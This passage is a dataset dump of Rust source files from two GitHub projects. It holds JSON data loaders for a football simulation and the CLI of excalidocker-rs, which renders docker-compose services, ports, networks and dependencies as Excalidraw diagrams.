repo stringlengths 6 65 | file_url stringlengths 81 311 | file_path stringlengths 6 227 | content stringlengths 0 32.8k | language stringclasses 1 value | license stringclasses 7 values | commit_sha stringlengths 40 40 | retrieved_at stringdate 2026-01-04 15:31:58 2026-01-04 20:25:31 | truncated bool 2 classes |
|---|---|---|---|---|---|---|---|---|
ZOXEXIVO/open-football | https://github.com/ZOXEXIVO/open-football/blob/7b55c8c095942c1df498d7aa02b524af6e3a896c/src/database/src/loaders/league.rs | src/database/src/loaders/league.rs | use serde::Deserialize;
const STATIC_LEAGUES_JSON: &str = include_str!("../data/leagues.json");
/// A league as declared in the bundled `leagues.json` data file.
#[derive(Deserialize)]
pub struct LeagueEntity {
    /// Unique league identifier.
    pub id: u32,
    /// URL-friendly identifier (e.g. for routing).
    pub slug: String,
    /// Human-readable league name.
    pub name: String,
    /// Identifier of the country this league belongs to.
    pub country_id: u32,
    /// Season scheduling settings for the league.
    pub settings: LeagueSettingsEntity,
    /// League reputation score; range defined by the data file. TODO confirm scale.
    pub reputation: u16,
}
/// Season boundaries for a league: when each half of the season starts and ends.
#[derive(Deserialize)]
pub struct LeagueSettingsEntity {
    /// Day/month window for the first half of the season.
    pub season_starting_half: DayMonthPeriodEntity,
    /// Day/month window for the second half of the season.
    pub season_ending_half: DayMonthPeriodEntity,
}
/// A calendar period expressed as day/month pairs (year-agnostic).
#[derive(Debug, Deserialize)]
pub struct DayMonthPeriodEntity {
    // Start of the period.
    pub from_day: u8,
    pub from_month: u8,
    // End of the period (inclusive or exclusive is defined by the consumer).
    pub to_day: u8,
    pub to_month: u8,
}
/// Loads league definitions from the JSON data embedded at compile time.
pub struct LeagueLoader;
impl LeagueLoader {
    /// Parses the bundled `leagues.json` into a list of [`LeagueEntity`].
    ///
    /// # Panics
    /// Panics with a descriptive message if the embedded JSON does not
    /// deserialize into `Vec<LeagueEntity>` (a build-data bug, not a
    /// runtime condition callers can recover from).
    pub fn load() -> Vec<LeagueEntity> {
        serde_json::from_str(STATIC_LEAGUES_JSON)
            .expect("bundled leagues.json is malformed or does not match LeagueEntity")
    }
}
| rust | Apache-2.0 | 7b55c8c095942c1df498d7aa02b524af6e3a896c | 2026-01-04T20:24:06.162327Z | false |
ZOXEXIVO/open-football | https://github.com/ZOXEXIVO/open-football/blob/7b55c8c095942c1df498d7aa02b524af6e3a896c/src/database/src/loaders/continent.rs | src/database/src/loaders/continent.rs | use serde::Deserialize;
const STATIC_CONTINENTS_JSON: &str = include_str!("../data/continents.json");
/// A continent as declared in the bundled `continents.json` data file.
#[derive(Deserialize)]
pub struct ContinentEntity {
    /// Unique continent identifier.
    pub id: u32,
    /// Human-readable continent name.
    pub name: String,
}
/// Loads continent definitions from the JSON data embedded at compile time.
pub struct ContinentLoader;
impl ContinentLoader {
    /// Parses the bundled `continents.json` into a list of [`ContinentEntity`].
    ///
    /// # Panics
    /// Panics with a descriptive message if the embedded JSON does not
    /// deserialize into `Vec<ContinentEntity>` — a build-data bug.
    pub fn load() -> Vec<ContinentEntity> {
        serde_json::from_str(STATIC_CONTINENTS_JSON)
            .expect("bundled continents.json is malformed or does not match ContinentEntity")
    }
}
| rust | Apache-2.0 | 7b55c8c095942c1df498d7aa02b524af6e3a896c | 2026-01-04T20:24:06.162327Z | false |
etolbakov/excalidocker-rs | https://github.com/etolbakov/excalidocker-rs/blob/1516e3e3bb3edabbfa79b7bacde5488b2dc0a0ef/src/color_utils.rs | src/color_utils.rs | use phf::phf_map;
/// Compile-time lookup table mapping CSS named colors to their hex codes.
/// Taken from https://github.com/bahamas10/css-color-names/blob/master/getcolors.sh
pub static COLOR_TO_HEX: phf::Map<&str, &str> = phf_map! {
    "aliceblue" => "#f0f8ff",
    "antiquewhite" => "#faebd7",
    "aqua" => "#00ffff",
    "aquamarine" => "#7fffd4",
    "azure" => "#f0ffff",
    "beige" => "#f5f5dc",
    "bisque" => "#ffe4c4",
    "black" => "#000000",
    "blanchedalmond" => "#ffebcd",
    "blue" => "#0000ff",
    "blueviolet" => "#8a2be2",
    "brown" => "#a52a2a",
    "burlywood" => "#deb887",
    "cadetblue" => "#5f9ea0",
    "chartreuse" => "#7fff00",
    "chocolate" => "#d2691e",
    "coral" => "#ff7f50",
    "cornflowerblue" => "#6495ed",
    "cornsilk" => "#fff8dc",
    "crimson" => "#dc143c",
    "cyan" => "#00ffff",
    "darkblue" => "#00008b",
    "darkcyan" => "#008b8b",
    "darkgoldenrod" => "#b8860b",
    "darkgray" => "#a9a9a9",
    "darkgreen" => "#006400",
    "darkgrey" => "#a9a9a9",
    "darkkhaki" => "#bdb76b",
    "darkmagenta" => "#8b008b",
    "darkolivegreen" => "#556b2f",
    "darkorange" => "#ff8c00",
    "darkorchid" => "#9932cc",
    "darkred" => "#8b0000",
    "darksalmon" => "#e9967a",
    "darkseagreen" => "#8fbc8f",
    "darkslateblue" => "#483d8b",
    "darkslategray" => "#2f4f4f",
    "darkslategrey" => "#2f4f4f",
    "darkturquoise" => "#00ced1",
    "darkviolet" => "#9400d3",
    "deeppink" => "#ff1493",
    "deepskyblue" => "#00bfff",
    "dimgray" => "#696969",
    "dimgrey" => "#696969",
    "dodgerblue" => "#1e90ff",
    "firebrick" => "#b22222",
    "floralwhite" => "#fffaf0",
    "forestgreen" => "#228b22",
    "fuchsia" => "#ff00ff",
    "gainsboro" => "#dcdcdc",
    "ghostwhite" => "#f8f8ff",
    "gold" => "#ffd700",
    "goldenrod" => "#daa520",
    "gray" => "#808080",
    "green" => "#008000",
    "greenyellow" => "#adff2f",
    "grey" => "#808080",
    "honeydew" => "#f0fff0",
    "hotpink" => "#ff69b4",
    "indianred" => "#cd5c5c",
    "indigo" => "#4b0082",
    "ivory" => "#fffff0",
    "khaki" => "#f0e68c",
    "lavender" => "#e6e6fa",
    "lavenderblush" => "#fff0f5",
    "lawngreen" => "#7cfc00",
    "lemonchiffon" => "#fffacd",
    "lightblue" => "#add8e6",
    "lightcoral" => "#f08080",
    "lightcyan" => "#e0ffff",
    "lightgoldenrodyellow" => "#fafad2",
    "lightgray" => "#d3d3d3",
    "lightgreen" => "#90ee90",
    "lightgrey" => "#d3d3d3",
    "lightpink" => "#ffb6c1",
    "lightsalmon" => "#ffa07a",
    "lightseagreen" => "#20b2aa",
    "lightskyblue" => "#87cefa",
    "lightslategray" => "#778899",
    "lightslategrey" => "#778899",
    "lightsteelblue" => "#b0c4de",
    "lightyellow" => "#ffffe0",
    "lime" => "#00ff00",
    "limegreen" => "#32cd32",
    "linen" => "#faf0e6",
    "magenta" => "#ff00ff",
    "maroon" => "#800000",
    "mediumaquamarine" => "#66cdaa",
    "mediumblue" => "#0000cd",
    "mediumorchid" => "#ba55d3",
    "mediumpurple" => "#9370db",
    "mediumseagreen" => "#3cb371",
    "mediumslateblue" => "#7b68ee",
    "mediumspringgreen" => "#00fa9a",
    "mediumturquoise" => "#48d1cc",
    "mediumvioletred" => "#c71585",
    "midnightblue" => "#191970",
    "mintcream" => "#f5fffa",
    "mistyrose" => "#ffe4e1",
    "moccasin" => "#ffe4b5",
    "navajowhite" => "#ffdead",
    "navy" => "#000080",
    "oldlace" => "#fdf5e6",
    "olive" => "#808000",
    "olivedrab" => "#6b8e23",
    "orange" => "#ffa500",
    "orangered" => "#ff4500",
    "orchid" => "#da70d6",
    "palegoldenrod" => "#eee8aa",
    "palegreen" => "#98fb98",
    "paleturquoise" => "#afeeee",
    "palevioletred" => "#db7093",
    "papayawhip" => "#ffefd5",
    "peachpuff" => "#ffdab9",
    "peru" => "#cd853f",
    "pink" => "#ffc0cb",
    "plum" => "#dda0dd",
    "powderblue" => "#b0e0e6",
    "purple" => "#800080",
    "rebeccapurple" => "#663399",
    "red" => "#ff0000",
    "rosybrown" => "#bc8f8f",
    "royalblue" => "#4169e1",
    "saddlebrown" => "#8b4513",
    "salmon" => "#fa8072",
    "sandybrown" => "#f4a460",
    "seagreen" => "#2e8b57",
    "seashell" => "#fff5ee",
    "sienna" => "#a0522d",
    "silver" => "#c0c0c0",
    "skyblue" => "#87ceeb",
    "slateblue" => "#6a5acd",
    "slategray" => "#708090",
    "slategrey" => "#708090",
    "snow" => "#fffafa",
    "springgreen" => "#00ff7f",
    "steelblue" => "#4682b4",
    "tan" => "#d2b48c",
    "teal" => "#008080",
    "thistle" => "#d8bfd8",
    "tomato" => "#ff6347",
    "turquoise" => "#40e0d0",
    "violet" => "#ee82ee",
    "wheat" => "#f5deb3",
    "white" => "#ffffff",
    "whitesmoke" => "#f5f5f5",
    "yellow" => "#ffff00",
    "yellowgreen" => "#9acd32",
};
| rust | MIT | 1516e3e3bb3edabbfa79b7bacde5488b2dc0a0ef | 2026-01-04T20:25:32.074311Z | false |
etolbakov/excalidocker-rs | https://github.com/etolbakov/excalidocker-rs/blob/1516e3e3bb3edabbfa79b7bacde5488b2dc0a0ef/src/error.rs | src/error.rs | use thiserror::Error;
#[derive(Error, Debug)]
pub enum ExcalidockerError {
#[error(
"File '{}' has unsupported extension. File should be 'yaml' or 'yml'",
path
)]
FileIncorrectExtension { path: String },
#[error("Failed to open '{}'. Details: {}", path, msg)]
FileNotFound { path: String, msg: String },
#[error("Failed to download '{}'. Details: {}", path, msg)]
RemoteFileFailedRead { path: String, msg: String },
#[error("Failed to parse provided docker-compose '{}'. Details: {}", path, msg)]
InvalidDockerCompose { path: String, msg: String },
}
| rust | MIT | 1516e3e3bb3edabbfa79b7bacde5488b2dc0a0ef | 2026-01-04T20:25:32.074311Z | false |
etolbakov/excalidocker-rs | https://github.com/etolbakov/excalidocker-rs/blob/1516e3e3bb3edabbfa79b7bacde5488b2dc0a0ef/src/file_utils.rs | src/file_utils.rs | use std::io::Read;
use std::{fs::File, process::exit};
use isahc::ReadResponseExt;
use serde_yaml::{Mapping, Value};
use crate::exporters::excalidraw_config::DEFAULT_CONFIG;
use crate::{
error::ExcalidockerError::{self, FileIncorrectExtension, FileNotFound, RemoteFileFailedRead},
exporters::excalidraw_config::ExcalidrawConfig,
};
/// Loads the excalidraw rendering configuration from `file_path`.
///
/// If the file is missing or unreadable the compiled-in `DEFAULT_CONFIG`
/// is used instead. A configuration that *exists* but fails to parse is a
/// hard error: the message is printed and the process exits with code 1.
pub fn get_excalidraw_config(file_path: &str) -> ExcalidrawConfig {
    // Fall back to the hardcoded default when neither the provided config
    // nor the default-path config can be read.
    let contents = read_yaml_file(file_path).unwrap_or_else(|_| DEFAULT_CONFIG.to_string());
    serde_yaml::from_str(&contents).unwrap_or_else(|err| {
        println!("Configuration parsing issue: {}", err);
        exit(1);
    })
}
/// Reads and parses a docker-compose file (local path or URL) into its
/// top-level YAML mapping.
///
/// Any read or parse failure is printed and an empty `Mapping` is
/// returned, so callers always receive a usable (possibly empty) mapping.
pub fn get_docker_compose_content(file_path: &str) -> Mapping {
    let file_content = match get_file_content(file_path) {
        Ok(content) => content,
        Err(err) => {
            println!("{}", err);
            return Mapping::new();
        }
    };
    match serde_yaml::from_str::<Value>(&file_content) {
        Ok(mut yaml_content) => {
            // Resolve YAML merge keys (`<<:`) so anchored/aliased sections
            // are expanded before we inspect the document.
            let _ = yaml_content.apply_merge(); // TODO potentially here we know which files are using anchors
            yaml_content
                .as_mapping()
                .cloned()
                // Non-mapping top level (e.g. a bare scalar) degrades to empty.
                .unwrap_or_default()
        }
        Err(err) => {
            println!("{}", err);
            Mapping::new()
        }
    }
}
/// Read yaml file content into a String
fn read_yaml_file(file_path: &str) -> Result<String, ExcalidockerError> {
if !(file_path.ends_with(".yaml") || file_path.ends_with(".yml")) {
return Err(FileIncorrectExtension {
path: file_path.to_string(),
});
}
let mut file = match File::open(file_path) {
Ok(file) => file,
Err(err) => {
return Err(FileNotFound {
path: file_path.to_string(),
msg: err.to_string(),
})
}
};
let mut contents = String::new();
match file.read_to_string(&mut contents) {
Ok(_) => Ok(contents),
Err(err) => Err(FileNotFound {
path: file_path.to_string(),
msg: err.to_string(),
}),
}
}
/// Get file content as a String.
/// Both remote (f.e. from Github) and local files are supported
/// Get file content as a String.
/// Both remote (f.e. from Github) and local files are supported.
fn get_file_content(file_path: &str) -> Result<String, ExcalidockerError> {
    // Local paths go straight through the YAML reader.
    if !file_path.starts_with("http") {
        return read_yaml_file(file_path);
    }
    // Remote path: normalize GitHub website links to raw-content links first.
    let url = rewrite_github_url(file_path);
    let make_err = |msg: String| RemoteFileFailedRead {
        path: file_path.to_string(),
        msg,
    };
    let mut response = isahc::get(url).map_err(|err| make_err(err.to_string()))?;
    response.text().map_err(|err| make_err(err.to_string()))
}
/// Rewrites a GitHub website link into its raw-content equivalent so the
/// referenced file body can be fetched directly.
/// Links that do not point at `github.com` (including already-raw
/// `raw.githubusercontent.com` links) pass through unchanged.
fn rewrite_github_url(input: &str) -> String {
    if !input.contains("github.com") {
        return input.to_owned();
    }
    input
        .replace("https://github.com/", "https://raw.githubusercontent.com/")
        .replace("/blob/", "/")
}
// Covers the three interesting cases: plain branch links, nested branch
// names containing '/', and already-raw links that must pass through.
#[test]
fn test_rewrite_github_url() {
    let input1 = "https://github.com/etolbakov/excalidocker-rs/blob/main/data/compose/docker-compose-very-large.yaml";
    assert_eq!(
        "https://raw.githubusercontent.com/etolbakov/excalidocker-rs/main/data/compose/docker-compose-very-large.yaml",
        rewrite_github_url(input1)
    );
    let input2 =
        "https://github.com/treeverse/lakeFS/blob/master/deployments/compose/docker-compose.yml";
    assert_eq!(
        "https://raw.githubusercontent.com/treeverse/lakeFS/master/deployments/compose/docker-compose.yml",
        rewrite_github_url(input2)
    );
    // Branch name itself contains a slash ("feat/edge-type-support").
    let input3 = "https://github.com/etolbakov/excalidocker-rs/blob/feat/edge-type-support/data/compose/docker-compose-very-large.yaml";
    assert_eq!(
        "https://raw.githubusercontent.com/etolbakov/excalidocker-rs/feat/edge-type-support/data/compose/docker-compose-very-large.yaml",
        rewrite_github_url(input3)
    );
    // Already a raw link: must be returned unchanged.
    let input4 = "https://raw.githubusercontent.com/etolbakov/excalidocker-rs/blob/edge-type-support/data/compose/docker-compose-very-large.yaml";
    assert_eq!(
        "https://raw.githubusercontent.com/etolbakov/excalidocker-rs/blob/edge-type-support/data/compose/docker-compose-very-large.yaml",
        rewrite_github_url(input4)
    );
}
| rust | MIT | 1516e3e3bb3edabbfa79b7bacde5488b2dc0a0ef | 2026-01-04T20:25:32.074311Z | false |
etolbakov/excalidocker-rs | https://github.com/etolbakov/excalidocker-rs/blob/1516e3e3bb3edabbfa79b7bacde5488b2dc0a0ef/src/main.rs | src/main.rs | mod color_utils;
mod error;
mod exporters;
mod file_utils;
use clap::{arg, command, Parser};
use exporters::excalidraw::elements::{
FONT_SIZE_EXTRA_LARGE, FONT_SIZE_LARGE, FONT_SIZE_MEDIUM, FONT_SIZE_SMALL,
};
use exporters::excalidraw_config::{
arrow_bounded_element, binding, BoundElement, DEFAULT_CONFIG_PATH,
};
use exporters::excalidraw_config::{margins, ExcalidrawConfig};
use indexmap::IndexMap;
use rand::{distributions::Alphanumeric, Rng};
use std::collections::{HashMap, HashSet};
use std::fs;
use std::vec;
use exporters::excalidraw::{Element, ExcalidrawFile};
use serde::{Deserialize, Serialize};
use serde_yaml::Value;
use crate::error::ExcalidockerError::InvalidDockerCompose;
use crate::exporters::excalidraw::elements;
// Command-line interface. NOTE: the `///` comments on the fields below are
// rendered by clap as the --help text, so they are user-facing strings and
// must not be reworded casually.
#[derive(Parser)]
#[command(name = clap::crate_name!())]
#[command(author = clap::crate_authors!())]
#[command(version = clap::crate_version!())]
#[command(about = clap::crate_description!(), long_about = None)]
#[command(override_usage(format!(
    "
    {} {}
    ╰→ excalidocker --input-path <INPUT_PATH>
    ╰→ excalidocker --show-config",
    clap::crate_name!(),
    clap::crate_version!())
))]
struct Cli {
    /// show configuration file
    #[arg(short = 'C', long, default_value_t = false)]
    show_config: bool,
    /// file path to the docker-compose.yaml
    #[arg(short, long, required_unless_present = "show_config")]
    input_path: Option<String>,
    /// display connecting lines between services; if `true` then only service without the lines are rendered
    #[arg(short, long, default_value_t = false)]
    skip_dependencies: bool,
    /// display network(s); if `true` then network are not rendered
    #[arg(short = 'N', long, default_value_t = false)]
    skip_network: bool,
    /// file path for the output excalidraw file.
    /// By default the file content is sent to console output
    #[arg(short, long)]
    output_path: Option<String>,
    /// config file path for the excalidraw.
    #[arg(short, long, default_value_t = DEFAULT_CONFIG_PATH.to_string())]
    config_path: String,
}
/// A placed container: (service name, canvas x, canvas y).
#[derive(Debug, Clone)]
struct ContainerPoint(String, i32, i32);
impl ContainerPoint {
    /// Builds a point for the service `name` located at (`x`, `y`).
    fn new(name: String, x: i32, y: i32) -> Self {
        ContainerPoint(name, x, y)
    }
}
/// A service node in the dependency graph: the services it depends on are
/// stored in `parent`.
#[derive(Debug, Clone)]
struct DependencyComponent {
    // Excalidraw element id of the service's rectangle.
    id: String,
    // Service name as declared in docker-compose.
    name: String,
    // Direct dependencies of this service.
    parent: Vec<DependencyComponent>,
}
impl DependencyComponent {
    /// Creates a dependency node for service `name` with element id `id`.
    fn new(id: String, name: String, parent: Vec<DependencyComponent>) -> Self {
        DependencyComponent { id, name, parent }
    }
}
/// Post-order DFS over the dependency graph: all of `name`'s dependencies
/// (its `parent` list) are appended to `containers_traversal_order` before
/// `name` itself, so dependencies are laid out first. `visited` guards
/// against duplicates and cycles.
fn traverse_in_hierarchy(
    name: &str,
    dependencies: &IndexMap<&str, DependencyComponent>,
    containers_traversal_order: &mut Vec<String>,
    visited: &mut HashSet<String>,
) {
    if let Some(children) = dependencies.get(name) {
        for child in &children.parent {
            if !visited.contains(&child.name) {
                traverse_in_hierarchy(
                    &child.name,
                    dependencies,
                    containers_traversal_order,
                    visited,
                );
            }
        }
    }
    // Emit the node itself once, after all of its dependencies.
    if !visited.contains(name) {
        containers_traversal_order.push(name.to_string());
        visited.insert(name.to_string());
    }
}
// fn build_hierarchy(containers: &HashMap<String, Container>) -> HashMap<String, Vec<String>> {
// let mut dependencies: HashMap<String, Vec<String>> = HashMap::new();
// for (name, container) in containers {
// for dependency in &container.depends_on {
// dependencies
// .entry(dependency.clone())
// .or_insert_with(Vec::new)
// .push(name.clone());
// }
// }
/// This struct is introduced to hold intermediate state of the rectangle.
/// Due to the implementation logic the rectangle initialization (`x`, `y`, `width`, `height`)
/// is happening in the beginning of the program while `group_ids` and `bound_elements`
/// could be added/updated later.
#[derive(Debug, Clone)]
struct RectangleStruct {
    // Excalidraw element id of this rectangle.
    pub id: String,
    // Service name rendered inside the rectangle.
    pub container_name: String,
    pub x: i32,
    pub y: i32,
    pub width: i32,
    pub height: i32,
    // Excalidraw groups the rectangle belongs to.
    pub group_ids: Vec<String>,
    // Groups for the label text (kept separate from the rectangle's groups).
    pub text_group_ids: Vec<String>,
    // Arrows bound to this rectangle; filled in as connections are created.
    pub bound_elements: Vec<BoundElement>,
}
/// Entry point: parses CLI options, reads the docker-compose file, lays out
/// services, ports, networks and dependency arrows, then emits the resulting
/// excalidraw JSON to stdout or to `--output-path`.
fn main() {
    let cli = Cli::parse();
    let excalidraw_config: ExcalidrawConfig =
        file_utils::get_excalidraw_config(cli.config_path.as_str());
    // --show-config only prints the effective configuration and exits.
    if cli.show_config {
        println!("{}", serde_yaml::to_string(&excalidraw_config).unwrap());
        return;
    }
    let mut excalidraw_file = ExcalidrawFile::default();
    let scale = excalidraw_file.app_state.grid_size;
    // Layout cursor and default container/port geometry (pixels).
    let mut x = 0;
    let mut y = 0;
    let width = 140;
    let height = 60;
    let port_diameter = 60;
    let mut container_name_rectangle_structs = HashMap::new();
    let mut container_name_to_point = HashMap::new();
    let mut container_name_to_parents: IndexMap<&str, DependencyComponent> = IndexMap::new();
    let mut container_name_to_container_struct = HashMap::new();
    // Safe: clap makes --input-path required unless --show-config was given,
    // and the show-config branch returned above.
    let input_path = &cli.input_path.unwrap();
    let input_filepath = input_path.as_str();
    let docker_compose_yaml = file_utils::get_docker_compose_content(input_filepath);
    let alignment_mode = excalidraw_config.alignment.mode.as_str();
    let (x_margin, y_margin, x_alignment_factor, y_alignment_factor) = margins(alignment_mode);
    // A compose file without a 'services' section is not usable; report and stop.
    let services = match docker_compose_yaml.get("services") {
        Some(services) => services,
        None => {
            println!(
                "{}",
                InvalidDockerCompose {
                    path: input_filepath.to_string(),
                    msg: "Failed to get 'services' attribute".to_string()
                }
            );
            return;
        }
    };
    let networks = docker_compose_yaml
        .get("networks")
        .and_then(DockerContainer::parse_networks);
    // First pass: build per-service structs and the dependency graph.
    let mut identifier: i32 = 1;
    for (container_name_val, container_data_val) in services.as_mapping().unwrap() {
        let container_id = format!("container_{}", identifier);
        let container_struct =
            DockerContainer::convert_to_container(container_id.clone(), container_data_val);
        let container_name_str = container_name_val.as_str().unwrap();
        let dependency_component = create_dependency_component(
            container_id,
            container_name_str.to_string(),
            &container_struct.depends_on,
        );
        container_name_to_parents.insert(container_name_str, dependency_component);
        container_name_to_container_struct.insert(container_name_str, container_struct);
        identifier += 1;
    }
    // Second pass: place containers in dependency order, advancing the cursor.
    let containers_traversal_order =
        find_containers_traversal_order(container_name_to_parents.clone());
    for cn_name in containers_traversal_order {
        let container_width =
            width + find_additional_width(cn_name.as_str(), &scale, &excalidraw_config.font.size);
        let container_struct = container_name_to_container_struct
            .get(cn_name.as_str())
            .unwrap();
        container_name_to_point.insert(cn_name.clone(), ContainerPoint::new(cn_name.clone(), x, y));
        // ------------ Define container ------------
        let container_group = vec![format!("container_group_{}", generate_id())];
        let mut rectangle_struct = RectangleStruct {
            id: container_struct.id.clone(),
            container_name: cn_name.clone(),
            x,
            y,
            width: container_width,
            height,
            group_ids: container_group.clone(),
            text_group_ids: container_group.clone(),
            bound_elements: vec![],
        };
        // ------------ Define ports ------------
        let ports = container_struct.clone().ports.unwrap_or(Vec::new());
        for (i, port) in ports.iter().enumerate() {
            let i = i as i32;
            let (container_adjustment_x, container_adjustment_y) =
                get_container_xy(alignment_mode, &container_width, &scale, i);
            let container_x = x + container_adjustment_x;
            let container_y = y + container_adjustment_y;
            let (host_port_str, container_port_str) = extract_host_container_ports(port);
            let ellipse_port_group = vec![format!("group_{}_hostport_{}_text", cn_name, i)];
            let ellipse_host_port_id = format!("ellipse_{}", generate_id());
            let host_port_arrow_id = format!("port_arrow_{}", generate_id());
            // Host port is drawn as an ellipse connected to the container by an arrow.
            let host_port = Element::draw_ellipse(
                ellipse_host_port_id.clone(),
                container_x,
                container_y,
                port_diameter,
                port_diameter,
                ellipse_port_group.clone(),
                vec![arrow_bounded_element(host_port_arrow_id.clone())],
                excalidraw_config.ports.background_color.clone(),
                excalidraw_config.ports.fill.clone(),
            );
            let host_port_text = Element::draw_small_monospaced_text(
                host_port_str.clone(),
                container_x + 15,
                container_y + 20,
                ellipse_port_group.clone(),
                excalidraw_config.font.size,
                excalidraw_config.font.family,
            );
            let (host_port_arrow_x, host_port_arrow_y) =
                get_host_port_arrow_xy(alignment_mode, &height, &width, &container_width);
            let host_port_arrow = Element::simple_arrow(
                host_port_arrow_id.clone(),
                x + host_port_arrow_x,
                y + host_port_arrow_y,
                200,
                100,
                elements::STROKE_STYLE.into(),
                "sharp".to_string(),
                get_host_port_arrow_points(alignment_mode, i),
                binding(container_struct.id.clone()),
                binding(ellipse_host_port_id),
            );
            // bind the port arrow to the container
            rectangle_struct
                .bound_elements
                .push(arrow_bounded_element(host_port_arrow_id.to_string()));
            // Only render the container-side port label when it differs from the host port.
            if host_port_str != container_port_str {
                let (container_port_text_x, container_port_text_y) =
                    get_container_port_text_xy(alignment_mode, &height, &width, i);
                let container_port_text = Element::draw_small_monospaced_text(
                    container_port_str,
                    x + container_port_text_x,
                    y + container_port_text_y,
                    container_group.clone(),
                    excalidraw_config.font.size,
                    excalidraw_config.font.family,
                );
                excalidraw_file.elements.push(container_port_text);
            }
            excalidraw_file.elements.push(host_port);
            excalidraw_file.elements.push(host_port_text);
            excalidraw_file.elements.push(host_port_arrow);
        }
        // ------------ Define alignment ------------
        let (x_alignment, y_alignment) = get_alignment_factor_xy(
            alignment_mode,
            x_alignment_factor,
            y_alignment_factor,
            container_width,
            scale,
        );
        x += x_margin + x_alignment;
        y += y_margin + y_alignment;
        container_name_rectangle_structs.insert(cn_name, rectangle_struct);
    }
    // ------------ Define network ------------
    // Either the CLI flag or the config can disable network rendering.
    let containers_in_network = if cli.skip_network || !excalidraw_config.network.visible {
        vec![]
    } else {
        find_containers_in_network(
            container_name_to_parents.clone(),
            networks,
            container_name_to_container_struct.clone(),
        )
    };
    for (network_name, first_container_name, last_container_name) in containers_in_network {
        let first_container_struct = container_name_rectangle_structs
            .get(first_container_name.as_str())
            .unwrap();
        let last_container_struct = container_name_rectangle_structs
            .get(last_container_name.as_str())
            .unwrap();
        let (
            network_rectangle_x,
            network_rectangle_y,
            network_rectangle_width,
            network_rectangle_height,
        ) = get_network_rectangle_xy_width_height(
            alignment_mode,
            first_container_struct,
            last_container_struct,
            x_margin,
            y_margin,
        );
        let (network_text_x, network_text_y) = get_network_text_xy(
            alignment_mode,
            first_container_struct,
            last_container_struct,
            x_margin,
            y_margin,
        );
        let network_rectangle = Element::simple_rectangle(
            format!("network_rectangle_{network_name}"),
            network_rectangle_x,
            network_rectangle_y,
            network_rectangle_width,
            network_rectangle_height,
            Vec::new(),
            Vec::new(),
            elements::NETWORK_COLOR.into(),
            excalidraw_config.services.fill.clone(),
            elements::CONNECTION_STYLE.into(),
            excalidraw_config.services.edge.clone(),
        );
        let network_text = Element::draw_small_monospaced_text(
            network_name,
            network_text_x,
            network_text_y,
            Vec::new(),
            excalidraw_config.font.size,
            excalidraw_config.font.family,
        );
        excalidraw_file.elements.push(network_rectangle);
        excalidraw_file.elements.push(network_text);
    }
    // ------------ Define dependency arrows ------------
    for (
        container_name,
        DependencyComponent {
            id,
            name: _,
            parent,
        },
    ) in &container_name_to_parents
    {
        let ContainerPoint(_, x, y) = container_name_to_point.get(*container_name).unwrap();
        // any of those two conditions (cli argument or configuration setting) can switch off the connections
        let sorted_container_points =
            if cli.skip_dependencies || !excalidraw_config.connections.visible {
                Vec::<ContainerPoint>::new()
            } else {
                let mut points = parent
                    .iter()
                    .map(|dc| {
                        let cp = container_name_to_point.get(&dc.name).unwrap();
                        ContainerPoint::new(dc.name.clone(), cp.1, cp.2)
                    })
                    .collect::<Vec<ContainerPoint>>();
                points.sort_by(|cp1, cp2| cp2.1.cmp(&cp1.1));
                points
            };
        for (i, parent_point) in sorted_container_points.iter().enumerate() {
            let i = i as i32;
            let parent_name = &parent_point.0;
            let parent_temp_struct = container_name_rectangle_structs
                .get_mut(parent_name)
                .unwrap();
            let x_parent = &parent_point.1;
            let y_parent = &parent_point.2;
            let level_height = y_parent - y;
            let interation_x_margin = (i + 1) * scale;
            let connecting_arrow_points = get_connecting_arrow_points(
                alignment_mode,
                x,
                y,
                x_parent,
                y_parent,
                &height,
                &width,
                &interation_x_margin,
                &scale,
                level_height,
                i,
            );
            let connecting_arrow_id = format!("connecting_arrow_{}", generate_id());
            let (connecting_arrow_x, connecting_arrow_y) =
                get_connecting_arrow_xy(alignment_mode, interation_x_margin);
            let connecting_arrow = Element::simple_arrow(
                connecting_arrow_id.clone(),
                x + connecting_arrow_x,
                y + connecting_arrow_y,
                0,
                y_margin,
                elements::CONNECTION_STYLE.into(),
                excalidraw_config.connections.edge.clone(),
                connecting_arrow_points,
                binding(id.to_string()),                // child container
                binding(parent_temp_struct.id.clone()), // parent container
            );
            // for dependency connection we need to add:
            // - child container id to the binding
            // - parent container id to the binding
            // - boundElements for the child container (id of the connecting_arrow)
            // - boundElements for the parent container (id of the connecting_arrow)
            let connecting_arrow_bound = arrow_bounded_element(connecting_arrow_id);
            parent_temp_struct
                .bound_elements
                .push(connecting_arrow_bound.clone());
            let current_temp_struct = container_name_rectangle_structs
                .get_mut(*container_name)
                .unwrap();
            current_temp_struct
                .bound_elements
                .push(connecting_arrow_bound);
            excalidraw_file.elements.push(connecting_arrow);
        }
    }
    // Rectangles are emitted last, once all their bound arrows are known.
    container_name_rectangle_structs.values().for_each(|rect| {
        let container_rectangle = Element::simple_rectangle(
            rect.id.clone(),
            rect.x,
            rect.y,
            rect.width,
            rect.height,
            rect.group_ids.clone(),
            rect.bound_elements.clone(),
            excalidraw_config.services.background_color.clone(),
            excalidraw_config.services.fill.clone(),
            elements::STROKE_STYLE.into(),
            excalidraw_config.services.edge.clone(),
        );
        let container_text = Element::draw_small_monospaced_text(
            rect.container_name.clone(),
            rect.x + scale,
            rect.y + scale,
            rect.text_group_ids.clone(),
            excalidraw_config.font.size,
            excalidraw_config.font.family,
        );
        excalidraw_file.elements.push(container_rectangle);
        excalidraw_file.elements.push(container_text);
    });
    // Serialize and either write to the requested file or print to stdout.
    let excalidraw_data = serde_json::to_string(&excalidraw_file).unwrap();
    match cli.output_path {
        Some(output_file_path) => {
            fs::write(output_file_path.clone(), excalidraw_data).expect("Unable to write file");
            println!("\nConfiguration file : '{}'", cli.config_path.as_str());
            println!("\nInput file : '{}'", input_filepath);
            println!(
                "\nExcalidraw file is successfully generated and can be found at '{}'\n",
                output_file_path
            );
        }
        None => println!("{}", excalidraw_data),
    }
}
/// Wraps a service into a `DependencyComponent`, turning each name listed in
/// `depends_on` into a leaf child node (empty id, no parents of its own).
fn create_dependency_component(
    id: String,
    container_name: String,
    depends_on: &Option<Vec<String>>,
) -> DependencyComponent {
    let children = depends_on
        .as_ref()
        .map(|deps| {
            deps.iter()
                .map(|name| DependencyComponent::new("".to_string(), name.to_string(), Vec::new()))
                .collect::<Vec<DependencyComponent>>()
        })
        .unwrap_or_default();
    DependencyComponent::new(id, container_name, children)
}
/// Offset of a dependency arrow's anchor relative to its child container,
/// depending on the layout direction.
